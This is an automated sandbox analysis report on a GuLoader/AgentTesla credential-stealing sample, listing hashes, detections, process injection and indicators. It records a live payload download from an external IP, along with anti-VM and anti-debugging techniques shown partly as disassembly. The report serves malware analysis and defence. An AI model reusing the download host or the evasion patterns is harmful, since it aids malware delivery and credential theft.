Analysis Report SKM_C3350191107102300.exe

Overview

General Information

Sample Name: SKM_C3350191107102300.exe
Analysis ID: 356107
MD5: 58bb0368bc9cf6ec86c266f54cdefeeb
SHA1: 1b9beee4bf56a4d5b31654b7c7404df5ff13f2fe
SHA256: d8eb1f98c2e365646d4b849ce9463769f173f7b4c95ea4dc705429a1798e1cfb
Tags: GuLoader

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • SKM_C3350191107102300.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\SKM_C3350191107102300.exe' MD5: 58BB0368BC9CF6EC86C266F54CDEFEEB)
    • RegAsm.exe (PID: 6504 cmdline: 'C:\Users\user\Desktop\SKM_C3350191107102300.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: RegAsm.exe PID: 6504 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: RegAsm.exe PID: 6504 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: RegAsm.exe PID: 6504 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: SKM_C3350191107102300.exe | Virustotal: Detection: 21%

Compliance:

Uses 32bit PE files
Source: SKM_C3350191107102300.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.6:49726 -> 185.222.58.152:80
Source: Joe Sandbox View | ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
Source: global traffic | HTTP traffic detected: GET /EDUORIGIN_baxLdLkc20.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 185.222.58.152 | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 185.222.58.152 (50 identical entries)
Source: global traffic | HTTP traffic detected: GET /EDUORIGIN_baxLdLkc20.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 185.222.58.152 | Cache-Control: no-cache
Source: RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe | String found in binary or memory: http://185.222.58.152/EDUORIGIN_baxLdLkc20.bin
Source: RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp | String found in binary or memory: http://sHYyUE.com
Source: RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_021066CF NtMapViewOfSection, 0_2_021066CF
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106A5A NtMapViewOfSection, 0_2_02106A5A
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106A7E NtMapViewOfSection, 0_2_02106A7E
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106A9A NtMapViewOfSection, 0_2_02106A9A
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106AB6 NtMapViewOfSection, 0_2_02106AB6
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106ADE NtMapViewOfSection, 0_2_02106ADE
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106B0A NtMapViewOfSection, 0_2_02106B0A
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106B2E NtMapViewOfSection, 0_2_02106B2E
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_0210677A NtProtectVirtualMemory, NtMapViewOfSection, 0_2_0210677A
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106B7A NtMapViewOfSection, 0_2_02106B7A
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106B9E NtMapViewOfSection, 0_2_02106B9E
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106BBA NtMapViewOfSection, 0_2_02106BBA
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106BE2 NtMapViewOfSection, 0_2_02106BE2
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_0210680C NtProtectVirtualMemory, NtMapViewOfSection, 0_2_0210680C
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106C32 NtMapViewOfSection, 0_2_02106C32
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_0210687F NtProtectVirtualMemory, NtMapViewOfSection, 0_2_0210687F
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106896 NtMapViewOfSection, 0_2_02106896
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02106CAA NtMapViewOfSection, 0_2_02106CAA
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_0210693E NtMapViewOfSection, 0_2_0210693E
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_0210698E NtMapViewOfSection, 0_2_0210698E
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_021069AA NtMapViewOfSection, 0_2_021069AA
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_021069D6 NtMapViewOfSection, 0_2_021069D6
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_021069F6 NtMapViewOfSection, 0_2_021069F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0130693A NtSetInformationThread, 4_2_0130693A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_013063BF NtProtectVirtualMemory, 4_2_013063BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_013069AA NtSetInformationThread, 4_2_013069AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0130698E NtSetInformationThread, 4_2_0130698E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_013069F6 NtSetInformationThread, 4_2_013069F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_013069D6 NtSetInformationThread, 4_2_013069D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306B2E NtSetInformationThread, 4_2_01306B2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306B0A NtSetInformationThread, 4_2_01306B0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306B7A NtSetInformationThread, 4_2_01306B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306BBA NtSetInformationThread, 4_2_01306BBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306B9E NtSetInformationThread, 4_2_01306B9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306BE2 NtSetInformationThread, 4_2_01306BE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306A7E NtSetInformationThread, 4_2_01306A7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306A5A NtSetInformationThread, 4_2_01306A5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306AB6 NtSetInformationThread, 4_2_01306AB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306A9A NtSetInformationThread, 4_2_01306A9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306ADE NtSetInformationThread, 4_2_01306ADE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306C32 NtSetInformationThread, 4_2_01306C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01306CAA NtSetInformationThread, 4_2_01306CAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00FE78D8 4_2_00FE78D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00FE41E8 4_2_00FE41E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00FE99C0 4_2_00FE99C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00FE12F8 4_2_00FE12F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00FEE588 4_2_00FEE588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00FE41E0 4_2_00FE41E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_1D972CD8 4_2_1D972CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_1D970006 4_2_1D970006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_1D970040 4_2_1D970040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_1D97C3B0 4_2_1D97C3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_1D9805D8 4_2_1D9805D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_1DB146A0 4_2_1DB146A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_1DB14690 4_2_1DB14690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_1DB14650 4_2_1DB14650
Source: SKM_C3350191107102300.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SKM_C3350191107102300.exe, 00000000.00000002.387312508.00000000020B0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs SKM_C3350191107102300.exe
Source: SKM_C3350191107102300.exe, 00000000.00000000.329778630.000000000040F000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameKlysnerstorv8.exe vs SKM_C3350191107102300.exe
Source: SKM_C3350191107102300.exe | Binary or memory string: OriginalFilenameKlysnerstorv8.exe vs SKM_C3350191107102300.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: SKM_C3350191107102300.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@4/0@0/1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_01
Source: SKM_C3350191107102300.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SKM_C3350191107102300.exe | Virustotal: Detection: 21%
Source: unknown | Process created: C:\Users\user\Desktop\SKM_C3350191107102300.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_00408C00 push 0000001Eh; iretd 0_2_00408C0F
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_00403EDA push edi; retf 0_2_00403F29
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02105A4A push es; ret 0_2_02105A7C
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02105A71 push es; ret 0_2_02105A7C
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02101CBE push ss; retf 0_2_02101D39
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_021008AB push edx; ret 0_2_021008AC
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02101CD6 push ss; retf 0_2_02101D39
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02101D1C push ss; retf 0_2_02101D39
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02101D1C push ss; retf 0_2_02101D49
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02101D3E push ss; retf 0_2_02101D49
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_02101D28 push ss; retf 0_2_02101D39
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_021045B1 push ebx; retf 0_2_021045DA
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Code function: 0_2_021005AF push cs; retf 0_2_021005B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_1D979E4C push E8FFFFFFh; retf 4_2_1D979E51
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX (60 identical entries)
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Contains functionality to detect hardware virtualization (CPUID execution measurement)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0130210C
          Detected RDTSC dummy instruction sequence (likely for instruction hammering)
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | RDTSC instruction interceptor: First address: 0000000002102FA2 second address: 0000000002102FA2 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F7E70A9D098h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d test bl, dl 0x0000001f cmp eax, ebx 0x00000021 pop ecx 0x00000022 test ebx, ecx 0x00000024 add edi, edx 0x00000026 dec ecx 0x00000027 pushad 0x00000028 mov ah, F0h 0x0000002a cmp ah, FFFFFFF0h 0x0000002d jne 00007F7E70A9C5A5h 0x00000033 popad 0x00000034 cmp ecx, 00000000h 0x00000037 jne 00007F7E70A9D043h 0x00000039 push ecx 0x0000003a jmp 00007F7E70A9D0AAh 0x0000003c push esi 0x0000003d mov esi, 6EF0E26Ch 0x00000042 cmp esi, 6EF0E26Ch 0x00000048 jne 00007F7E70A9A718h 0x0000004e pop esi 0x0000004f call 00007F7E70A9D0E7h 0x00000054 call 00007F7E70A9D0A8h 0x00000059 lfence 0x0000005c mov edx, dword ptr [7FFE0014h] 0x00000062 lfence 0x00000065 ret 0x00000066 mov esi, edx 0x00000068 pushad 0x00000069 rdtsc
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | RDTSC instruction interceptor: First address: 00000000021006BA second address: 00000000021006BA
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | RDTSC instruction interceptor: First address: 0000000002100853 second address: 0000000002100853
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | RDTSC instruction interceptor: First address: 0000000001300F6A second address: 0000000001300F6A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | RDTSC instruction interceptor: First address: 0000000001301F08 second address: 0000000001301F08
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Tries to detect Any.run
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | File opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Program Files\qga\qga.exe
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: RegAsm.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | RDTSC instruction interceptor: First address: 000000000210319A second address: 000000000210319A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F7E70AAA270h 0x0000001d popad 0x0000001e jmp 00007F7E70AA7922h 0x00000020 test ax, dx 0x00000023 call 00007F7E70AA7934h 0x00000028 lfence 0x0000002b rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | RDTSC instruction interceptor: First address: 000000000130319A second address: 000000000130319A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F7E70A9FA00h 0x0000001d popad 0x0000001e jmp 00007F7E70A9D0B2h 0x00000020 test ax, dx 0x00000023 call 00007F7E70A9D0C4h 0x00000028 lfence 0x0000002b rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0130210C rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 2357
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 7483
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6904 | Thread sleep time: -25825441703193356s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: RegAsm.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information queried: ProcessInformation

          Anti Debugging:

          Hides threads from debuggers
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Thread information set: HideFromDebugger
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0130210C rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00FE6B68 LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_013052A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01302DD2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01305F0E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0130576C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01305EF3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: page read and write, page guard

          HIPS / PFW / Operating System Protection Evasion:

          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1300000
          Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe'
          Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
          Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_01302214 cpuid
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected AgentTesla
          Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY
